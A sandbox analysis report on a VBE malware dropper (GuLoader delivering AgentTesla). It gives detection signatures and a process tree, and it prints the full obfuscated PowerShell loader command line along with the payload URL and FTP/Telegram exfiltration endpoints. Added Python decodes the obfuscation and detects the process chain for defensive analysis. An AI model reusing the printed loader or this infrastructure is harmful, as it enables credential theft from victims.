Windows Analysis Report
PO-08784 xlsx.vbe

Overview

General Information

Sample Name: PO-08784 xlsx.vbe
Analysis ID: 755441
MD5: 266115592f966240c14dfeeec624bdf5
SHA1: 455a06b52d8e8f46d9a80067d3d1b1ea23036d65
SHA256: 1df8d51920f7e386c6b86379363cc42dd86fe47a933e36cecd23c7b08d3118e2

Detection

AgentTesla, GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
May check the online IP address of the machine
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64native
  • wscript.exe (PID: 8268 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • cmd.exe (PID: 3416 cmdline: CMD.EXE /c echo C:\Windows MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 4432 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl 
BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""TakRaeOcrSpnDieSelHa3Ax2Ne`"""Ov)Su]InpTouVibStlSaiFucAb HasBltPhaDitFeiMacTo paeWaxSltSleRarTenCa ThiDenkatOv MiVJeiRersktLuuDiabalUnAPylUnlDaoCocAb(moimunGatke FevNa1Da,KoiGrnAntbi FivCr2Se,KriLanhvtAg Savaa3go,NoilenMatNa PavSe4Co)Im;Ma[DeDTilStlStIKlmpupLuoCarMitHa(Tv`"""BakVieEnrBenSteEllTh3Hu2bi`"""Tr)Pl]PopHauLabsalIniRacFj UnsBetBoasltDkiPocHi PhevaxGntNoeGurMrnFl AcIAgnIntKoPDatAnrOs SwELinWeuHamStSCoySksMatSlePlmfeLMooKacdeaKolCueSysDyWaf(OmuFoiBonChtMy TavBo1Ha,KiiSonOptSh FavUn2Ud)Un;Na}Li'Sl;Ar`$jeMHyeDatSuhmuyUrlLi3Ne=Ha[TiMAdeLytFehFoyMilCa1re]co:Ov:beVNoisyrretWhuAbaTelNoAAklGalUnoSicLi(In0Dr,ro1Ch0De4Ro8Le5Ob7sk6Co,Le1Me2Sp2Sv8Lo8Ea,No6ph4Mi)Mi;Re`$StSTaeBelKovRefLrlTrgEbeNylBeiBrgDu=Pr(BrGFieGytDe-reISttKreViminPDorSaoIrpBeeLarJetAfySc Ex-WoPCraSptAzhDe 
Tr'SvHveKFoCCoUUd:Co\CebKraResAnaBrlBotCa\DetAprGuaManFisNofEsonurMemKoaSktSkiByoAbnOushaaSulScgCioSkrExiVitCimSieCyregnIreUd'Pa)tu.LuBBoeEthsueAlaDyrStsReeJa;Be`$UnGHirEmiFosRakUneEn Bu=Bi Br[AsSTiyUnsObtTweDrmBe.LiCStoRenorvKieVarAptEn]Ma:Ap:GeFKlrInoMumUdBseaImsInePl6fi4CaSVotBarBaiTonWagva(Se`$BeSLeeSnlBlvJafHulAfgpeeFrlBeiPhgGi)Ap;Pu[PiSOvyelsThtOxeSemge.SiRObuFrnBrtapiMumKleju.PiISpnRatIneUnrSyoAppneSPreSkrCovTiiJacAkeLessl.SiMStaTarFosCohTaaprlFa]Bl:Ci:TrCBooOupSkyAf(Fl`$UnGKurPaiKrsBrkDrece,di Pe0Up,Br Vl Pi`$GlMNieBatBlhSiyMylDe3Pr,Pr Sp`$ZoGArrCriTesHakPheSt.PrcGroSpuPonKntSp)Ph;Ho[TiMHeeAltAkhKnyPrlFa1Au]Si:Ru:CuEHjnPruMemFrSKoyressetKoeSpmVoLSloNucCaaMulpeeinsOvWBr(Sa`$AvMSkeNotSthDdyStlMe3Ir,Ka Ud0Sl)Ne#Sc;""";Function Methyl4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Teviss = $Teviss + $HS.Substring($i, 1); } $Teviss;}$Undefatigable0 = Methyl4 'SoIOrEReXAq ';$Undefatigable1= Methyl4 $Thyridia;&$Undefatigable0 $Undefatigable1;; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 8812 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 8896 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • CasPol.exe (PID: 1352 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
  • cleanup
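The powershell.exe command line in the tree above carries its own decoder: Methyl4 walks the string from index 2 in steps of three and keeps one character per step, so every real character is preceded by two junk letters. The short argument 'SoIOrEReXAq ' resolves to the cmdlet that runs the result, and $Thyridia is the stage-2 script. The Python below is an added example, not code from the report or from the sample; it ports Methyl4 so the second stage can be recovered offline without running it, and adds a brute-force helper (find_skip_pattern, our own addition) for variants that change the offset or stride. THYRIDIA_PREFIX is the opening of the captured $Thyridia string, cut on a junk pair so no real character is lost.

```python
"""
Every-third-character decoder for the PowerShell stage of this sample.
Added example; re-implements the Methyl4 function visible in the captured
command line:

    For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Teviss += $HS.Substring($i, 1) }

Keep index 2, 5, 8, ...; the loop bound means the final character is never read.
"""


def methyl4(hs: str) -> str:
    """Faithful port of Methyl4, including the `-lt $HS.Length-1` bound."""
    return "".join(hs[i] for i in range(2, len(hs) - 1, 3))


# Copied from the captured command line: `$Undefatigable0 = Methyl4 'SoIOrEReXAq '`
CMDLET_OBFUSCATED = "SoIOrEReXAq "

# Opening of the captured $Thyridia string (the report prints all of it). The
# prefix ends on the junk pair "En" so the last real character is still inside
# the loop bound.
THYRIDIA_PREFIX = (
    "ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'"
    "BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;"
    "VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk."
    "InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;"
    "TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En"
)


def decode_stage2(cmdlet_obf: str = CMDLET_OBFUSCATED,
                  payload_obf: str = THYRIDIA_PREFIX) -> tuple:
    """Return (cmdlet, script) as the sample computes them right before
    `&$Undefatigable0 $Undefatigable1` runs the script."""
    return methyl4(cmdlet_obf), methyl4(payload_obf)


def find_skip_pattern(obf: str, markers=("Add-Type", "IEX", "Invoke-Expression"),
                      max_stride: int = 8):
    """Our own helper (not in the sample): brute-force (offset, stride) for
    variants of the same scheme. Returns the first pair whose decoding contains
    one of the marker strings, or None if nothing matches."""
    for stride in range(2, max_stride + 1):
        for offset in range(stride):
            candidate = obf[offset::stride]
            if any(m in candidate for m in markers):
                return offset, stride
    return None


if __name__ == "__main__":
    cmdlet, script = decode_stage2()
    print(cmdlet)                       # the cmdlet that executes stage 2
    print(script)                       # Add-Type -TypeDefinition 'using System;...
    print(find_skip_pattern(THYRIDIA_PREFIX))
```

Decoding the captured text as-is works for the whole string because the escaped quotes keep the three-character rhythm: the group that follows the prefix decodes to [DllImport(`"kernel32`")], i.e. a PowerShell-escaped quote inside a single-quoted Add-Type source. That Add-Type call is what produces the csc.exe and cvtres.exe children under powershell.exe in the tree.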
No configs have been found
Source | Rule | Description | Author | Strings
PO-08784 xlsx.vbe | WScript_Shell_PowerShell_Combo | Detects malware from Middle Eastern campaign reported by Talos | Florian Roth
  • 0xa2e:$s1: .CreateObject("WScript.Shell")
  • 0x3ed54:$p1: powershell.exe
  • 0x4b97e:$p1: powershell.exe

Source | Rule | Description | Author
00000004.00000002.1784183387.00000000093A0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000011.00000000.1525854532.0000000001100000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

          Data Obfuscation

          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe 
InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""Unk
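The Sigma hit above fires on csc.exe reading a response file from %TEMP%, and the process tree adds two more chain-level observations (wscript.exe starting powershell.exe, and a 4705-character command line). The Python below is an added example, not Joe Security's or Sigma's code: it re-expresses those three findings as checks over Sysmon-style process-creation records, plus one check of our own for CasPol.exe running under powershell.exe, which is where the AgentTesla memory matches live in this tree. The event records are constructed from the tree in this report (PIDs, images and command lines as listed); the PowerShell command line is cut after its visible start and padded to the reported length, wscript.exe's parent PID and the benign csc.exe control record are made up, and the rule names and the 4000-character threshold are assumptions.

```python
"""
Process-chain checks for the execution tree in this report (added example).
Each rule mirrors one observation the sandbox made; the records are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(path: str) -> str:
    """Lower-cased file name of an image path (report paths are Windows-style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(ev: ProcEvent, by_pid: dict, limit: int = 8) -> list:
    """Walk parent links as far as the records allow; bounded against ppid loops."""
    chain = []
    cur = by_pid.get(ev.ppid)
    while cur is not None and len(chain) < limit:
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LONG_CMDLINE = 4000                      # assumed threshold; the report measured 4705
TEMP_PATH = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def detect(events: list) -> list:
    """Return (rule, pid) hits for the constructed rule set."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        name = basename(e.image)
        chain = [basename(a.image) for a in ancestors(e, by_pid)]
        # "Wscript starts Powershell (via cmd or directly)": parent or grandparent
        if name == "powershell.exe" and SCRIPT_HOSTS & set(chain[:2]):
            hits.append(("script_host_spawns_powershell", e.pid))
        # "Very long command line found"
        if len(e.cmdline) >= LONG_CMDLINE:
            hits.append(("very_long_command_line", e.pid))
        # Sigma: .NET compiler compiles a file from a suspicious (%TEMP%) location
        if name in {"csc.exe", "vbc.exe"} and TEMP_PATH.search(e.cmdline):
            hits.append(("dotnet_compiler_from_temp", e.pid))
        # our addition: CasPol.exe anywhere below powershell.exe
        if name == "caspol.exe" and "powershell.exe" in chain:
            hits.append(("caspol_under_powershell", e.pid))
    return hits


# Constructed records following the report's process tree.
_PS_START = r'C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo'
PS_CMDLINE = _PS_START + "." * (4705 - len(_PS_START))   # padded to the reported size

EVENTS = [
    ProcEvent(8268, 1, r"C:\Windows\System32\wscript.exe",          # parent PID made up
              r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe"'),
    ProcEvent(3416, 8268, r"C:\Windows\System32\cmd.exe", r"CMD.EXE /c echo C:\Windows"),
    ProcEvent(4432, 8268, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", PS_CMDLINE),
    ProcEvent(8812, 4432, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
              r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline'),
    ProcEvent(8896, 8812, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
              r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP"'),
    ProcEvent(1352, 4432, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe",
              r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"),
    # control record (made up): a build compiling from a project directory must not fire
    ProcEvent(5000, 4999, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
              r'csc.exe /noconfig @"C:\src\app\obj\Debug\app.cmdline'),
]

if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:32} pid={pid}")
```

Run against EVENTS this flags PID 4432 twice (script-host parent and command-line length), PID 8812 for the %TEMP% response file and PID 1352 for CasPol.exe under powershell.exe, while the cmd.exe hop and the control csc.exe record stay quiet. On real telemetry the parent walk is the part worth keeping: the compile-from-%TEMP% rule alone also matches legitimate Add-Type usage, so pairing it with a script-host ancestor is what makes it actionable.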
          Snort alert 1
          Timestamp: 11/28/22-18:14:18.239839
          Source: 192.168.11.20, Source Port: 49807
          Destination: 185.31.121.136, Destination Port: 21
          SID: 2029927
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Snort alert 2
          Timestamp: 11/28/22-18:14:18.274476
          Source: 192.168.11.20, Source Port: 49808
          Destination: 185.31.121.136, Destination Port: 56411
          SID: 2851779
          Protocol: TCP
          Classtype: A Network Trojan was detected

          AV Detection

          Source: http://pesterbdd.com/images/Pester.png | Avira URL Cloud: Label: malware
          Source: ftp.mcmprint.net | Virustotal: Detection: 9%
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
          Source: unknown | HTTPS traffic detected: 54.91.59.199:443 -> 192.168.11.20:49805 version: TLS 1.2
          Source: Binary string: $}l8C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.pdb | source: powershell.exe, 00000004.00000002.1687266902.0000000004531000.00000004.00000800.00020000.00000000.sdmp

          Networking

          Source: Traffic | Snort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.11.20:49807 -> 185.31.121.136:21
          Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.11.20:49808 -> 185.31.121.136:56411
          Source: unknown | DNS query: name: api.ipify.org
          Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox View | IP Address: 54.91.59.199
          Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 | Host: api.ipify.org | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wp-admin/includes/UtXRqIMUipDp192.pfb HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: b3solutionscws.com | Cache-Control: no-cache
          Source: global traffic | TCP traffic: 192.168.11.20:49808 -> 185.31.121.136:56411
          Source: unknown | FTP traffic detected: 185.31.121.136:21 -> 192.168.11.20:49807
            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
            220-You are user number 1 of 50 allowed.
            220-Local time is now 19:14. Server port: 21.
            220-This is a private system - No anonymous login
            220-IPv6 connections are also welcome on this server.
            220 You will be disconnected after 15 minutes of inactivity.
          Source: unknown | Network traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
          Source: CasPol.exe, 00000011.00000002.5824869400.000000000152A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://b3solutionscws.com/wp-admin/includes/UtXRqIMUipDp192.pfb
          Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000011.00000002.5900965300.000000001FC83000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000011.00000003.1767910735.000000001FC3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000011.00000003.1767910735.000000001FC3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kmbImL.com
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://oqyPj4HORVpk3nSGGk.net
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://oqyPj4HORVpk3nSGGk.netXy
          Source: powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000004.00000002.1676415365.00000000042E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
